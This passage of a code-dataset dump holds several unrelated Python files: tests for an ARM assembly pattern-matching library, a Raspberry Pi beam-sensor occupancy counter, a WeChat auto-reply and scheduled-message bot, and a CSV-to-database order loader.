parm.api.parsing.arm_pat import DataSeq, DataByte, DataWord\r\n\r\nfrom parm.api.match_result import MatchResult\r\nfrom parm.programs.snippet import ArmSnippetProgram\r\n\r\n\r\nclass ArmPatternTest(TestCase):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.program = ArmSnippetProgram()\r\n self.arm_pat_parser = parsers.create_arm_pattern_parser()\r\n self.arm_parser = parsers.create_arm_parser()\r\n self.arm_pat_transformer = arm_pat.ArmPatternTransformer()\r\n self.arm_transformer = arm_asm.ArmTransformer()\r\n\r\n def create_pattern(self, pattern):\r\n return self.program.create_pattern(pattern)\r\n\r\n def match_pattern(self, pattern, code):\r\n cursor = self.program.add_code_block(code)\r\n pat = self.create_pattern(pattern)\r\n mr = MatchResult()\r\n cursor.match(pat, mr)\r\n return mr\r\n\r\n def test_blx_tree(self):\r\n expected = BlockPat([CommandPat(InstructionPat(OpcodePat('blx*'), OperandsPat([RegPat(arm_pat.Reg('r0'))])))])\r\n assert self.create_pattern('blx* r0') == expected\r\n\r\n def test_bl_tree(self):\r\n expected = BlockPat([\r\n AddressPat(Label('test')),\r\n CommandPat(InstructionPat(OpcodePat('bl'), OperandsPat([AddressPat(WildcardSingle('test'))])))\r\n ])\r\n pat = self.create_pattern('test: bl @:test')\r\n assert pat == expected\r\n\r\n def test_python_pattern(self):\r\n expected = BlockPat([CommandPat(PythonCodeLine(\r\n [\"match_single(xrefs_to, 'MOV R1, R2')\"]\r\n ))])\r\n\r\n pat = self.create_pattern(\"\"\"\r\n % match_single(xrefs_to, 'MOV R1, R2')\r\n \"\"\")\r\n assert pat == expected\r\n\r\n def test_continued_python_pattern(self):\r\n # Test line continuation using \"\\\"\r\n expected = BlockPat([CommandPat(PythonCodeLine(\r\n [\"a = [1, 2, \\\\\\n 3]\"]\r\n ))])\r\n pat = self.create_pattern(\"\"\"\r\n % a = [1, 2, \\\\\r\n 3]\r\n \"\"\")\r\n assert pat == expected\r\n\r\n # Only a newline may occur after a \"\\\"\r\n with pytest.raises(lark.exceptions.UnexpectedCharacters):\r\n self.create_pattern(\"\"\"\r\n % a = [1, 2, \\\\ # comment\r\n 3]\r\n \"\"\")\r\n\r\n # Test line continuation when in square brackets\r\n expected = BlockPat([CommandPat(PythonCodeLine(\r\n [\"a = [1, 2,\\n 3]\"]\r\n ))])\r\n pat = self.create_pattern(\"\"\"\r\n % a = [1, 2,\r\n 3]\r\n \"\"\")\r\n assert pat == expected\r\n\r\n # Without \"\\\", the line is finished...\r\n with pytest.raises(lark.exceptions.UnexpectedCharacters):\r\n self.create_pattern(\"\"\"\r\n % a = \"test\"\r\n \"test\"\r\n \"\"\")\r\n\r\n # Test line continuation when in parentheses\r\n expected = BlockPat([CommandPat(PythonCodeLine(\r\n ['a = (\"test\"\\n \"test\")']\r\n ))])\r\n pat = self.create_pattern(\"\"\"\r\n % a = (\"test\"\r\n \"test\")\r\n \"\"\")\r\n assert pat == expected\r\n\r\n def test_multiline_python_pattern(self):\r\n expected = BlockPat([CommandPat(PythonCodeLines(\r\n [\" p = pat('MOV R1, R2')\", \" match_single(xrefs_to, p)\"]\r\n ))])\r\n\r\n pat = self.create_pattern(\"\"\"\r\n %%\r\n p = pat('MOV R1, R2')\r\n match_single(xrefs_to, p)\r\n %%\r\n \"\"\")\r\n assert pat == expected\r\n\r\n def test_db(self):\r\n expected = BlockPat([DataSeq([DataByte(0x10)])])\r\n pat = self.create_pattern('.db 0x10')\r\n assert pat == expected\r\n\r\n def test_anchor(self):\r\n block = BlockPat([DataSeq([DataByte(0x10)]), DataSeq([DataWord(0x200)])])\r\n pat = self.create_pattern(\"\"\"\r\n .db 0x10\r\n > .dw 0x200\r\n \"\"\")\r\n assert pat != block\r\n\r\n block.anchor_index = 1\r\n block.relink_lines()\r\n\r\n assert pat == block\r\n\r\n def 
test_match_mov(self):\r\n asm = 'mov r0, r1'\r\n pat = 'mov @:reg, r1'\r\n result = self.match_pattern(pat, asm)\r\n assert result['reg'].name == 'r0'\r\n\r\n def test_match_push(self):\r\n asm = 'push {r0, r1}'\r\n pat = 'push {*:regs}'\r\n result = self.match_pattern(pat, asm)\r\n assert result['regs'] == [arm_asm.Reg('r0'), arm_asm.Reg('r1')]\r\n","repo_name":"chananele/parm","sub_path":"parm/tests/arm_pat_test.py","file_name":"arm_pat_test.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"29338116842","text":"import RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(10, GPIO.IN)\nGPIO.setup(4, GPIO.IN)\n\n#Upon entering, beam 1 is broken before beam 2\n\nfirst = False\nsecond = False\ndirection = \"empty\"\ncount = 0\n\nwhile True:\n if GPIO.input(4) == 0:\n first = True\n direction = \"exit\"\n if GPIO.input(10) == 0:\n second = True\n direction = \"enter\"\n if first and second:\n if direction == \"enter\":\n count = count + 1\n print(\"One person entered. Occupancy is \" + str(count))\n if direction == \"exit\":\n if count > 0:\n count = count - 1\n print(\"One person exited. Occupancy is \" + str(count))\n else:\n print(\"One person exited. Occupancy is \" + str(count))\n first = False\n second = False\n time.sleep(0.5)","repo_name":"spjones97/HackNC","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26296940131","text":"from wxpy import *\n\nimport time,datetime\n\nfrom threading import Thread \nbot=Bot(cache_path=True)\n\n\n####        测试代码\n###################################################################################\n\n\n# 机器人账号自身\nmyself = bot.self\n\nprint(\"机器人自身:\",myself)\n\nallfriends = bot.friends()\n\nprint(\"机器人的所有好友:\",allfriends)\n\nallgroups = bot.chats(update=False)\n## 打印的是所有的微信的聊天对象\nprint(\"机器人的聊天对象:\",allgroups)\n\n\n\n#####################################################################################\n\n\n\n\n\n\nfriend = bot.friends().search('liyuan')[0]\nprint(friend)\n\nmessage = '这是message消息'\n# 功能一 :自动回复微信消息\n@bot.register() # 接收从指定好友发来的消息,发送者即recv_msg.sender为指定好友girl_friend\ndef recv_send_msg(recv_msg):\n #业务逻辑代码\n # 附加功能:增加消息记录的功能\n print('收到的消息:',recv_msg.text) # recv_msg.text取得文本\n if recv_msg.text == '1':\n return '1111111111111'\n elif recv_msg.text == '2':\n return '22222222222'\n return '您好,一个微信机器人,按1,按2试试'\n\n\n# 功能二 :主动推送消息给一些人\ndef putmsg(friend,message):\n friend.send(message)\n\n# 功能三 :定时的自动向目标群(好友)推送消息\ndef run(h,m):\n while True:\n now = datetime.datetime.now()\n print(now.hour,now.minute)\n if now.hour in h and now.minute in m:\n putmsg(friend,message)\n time.sleep(60)\n\n# run函数为定时启动的函数\n# run(23,m=[24])\n# 开辟一个新的进程对新的\n#p = Process(target = run,kwargs = {'h':22,'m':[50,51,52]})\np = Thread(target = run,kwargs = {'h':[23],'m':[8,9,10,11,12]})\np.start()\n#p.join()\n# 功能三:主动推送消息给一些人\n\n\n# 阻塞等待微信机器人的消息\n\nbot.join()","repo_name":"liyuan3970/study_demo","sub_path":"wx_py/wx_demo1.py","file_name":"wx_demo1.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"29152517697","text":"\"\"\"\nScript que carrega os dados de pedidos de um arquivo .csv e salva nas tabelas tb_pedidos e tb_produtos_pedidos\n\"\"\"\n\nimport csv\nimport os\n\nfrom datetime import datetime\n\nfrom 
config import sessao\nfrom models import Pedido, Produto, Usuario, ProdutoPedido\n\nif __name__ == \"__main__\":\n\n try:\n nome_arquivo = input(\"Informe o nome do arquivo de pedidos(ENTER para carregar o padrão pedidos.csv): \")\n\n if not nome_arquivo:\n nome_arquivo = \"pedidos.csv\"\n\n caminho_arquivo = os.path.join(os.getcwd(), \"arquivos\", nome_arquivo)\n\n lista_pedidos = {}\n\n with open(file=caminho_arquivo, mode='r', encoding=\"utf-8\") as arquivo:\n\n arquivo_csv = csv.DictReader(arquivo, delimiter=';')\n\n for linha in arquivo_csv:\n\n usuario = sessao.query(Usuario).filter_by(email=linha.get(\"email\")).first()\n\n produto = sessao.query(Produto).filter_by(sku=linha.get(\"sku\")).first()\n\n pedido_id = linha.get(\"pedido_id\")\n \n data_do_pedido=datetime.strptime(\n linha.get(\"data_do_pedido\"),\n \"%Y-%m-%d\"\n ).date()\n\n if not pedido_id in lista_pedidos.keys():\n lista_pedidos[pedido_id] = {\n \"usuario\": usuario,\n \"data_do_pedido\": data_do_pedido,\n \"produtos\": [{\n \"quantidade\": int(linha.get(\"quantidade\")),\n \"produto\": produto\n }]\n }\n\n else:\n lista_pedidos[pedido_id][\"produtos\"].append({\n \"quantidade\": int(linha.get(\"quantidade\")),\n \"produto\": produto\n })\n\n for _, info_pedido in lista_pedidos.items():\n pedido = Pedido(\n usuario=info_pedido.get(\"usuario\"),\n data_do_pedido=info_pedido.get(\"data_do_pedido\")\n )\n\n for produto in info_pedido.get(\"produtos\"):\n produto_pedido = ProdutoPedido(\n produto=produto.get(\"produto\"),\n quantidade=produto.get(\"quantidade\")\n )\n\n pedido.produtos.append(produto_pedido)\n\n sessao.add(produto_pedido)\n sessao.add(pedido)\n\n sessao.commit()\n\n except Exception as exc_info:\n print(f\"Erro ao carregar o arquivo: {exc_info}.\")","repo_name":"abispo/curso-python-proway-20231001","sub_path":"modulo02-python-com-banco-de-dados/20231203-aula05_desafio/carregar_pedidos.py","file_name":"carregar_pedidos.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
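For reference, the order-grouping step in the last record above (carregar_pedidos.py) can be exercised in isolation. The sketch below is a minimal, standard-library-only version assuming a pedidos.csv with pedido_id, email, sku and quantidade columns separated by ';' — the file name and column names are taken from that record, everything else (function name, output) is illustrative rather than part of the original script.

    import csv
    from collections import defaultdict

    def group_orders(path):
        """Group CSV rows by pedido_id, mirroring the dict built in carregar_pedidos.py."""
        orders = defaultdict(list)
        with open(path, mode="r", encoding="utf-8") as fh:
            for row in csv.DictReader(fh, delimiter=";"):
                # Each order id maps to the list of (sku, quantity) pairs it contains.
                orders[row["pedido_id"]].append((row["sku"], int(row["quantidade"])))
        return dict(orders)

    if __name__ == "__main__":
        for pedido_id, items in group_orders("pedidos.csv").items():
            print(pedido_id, items)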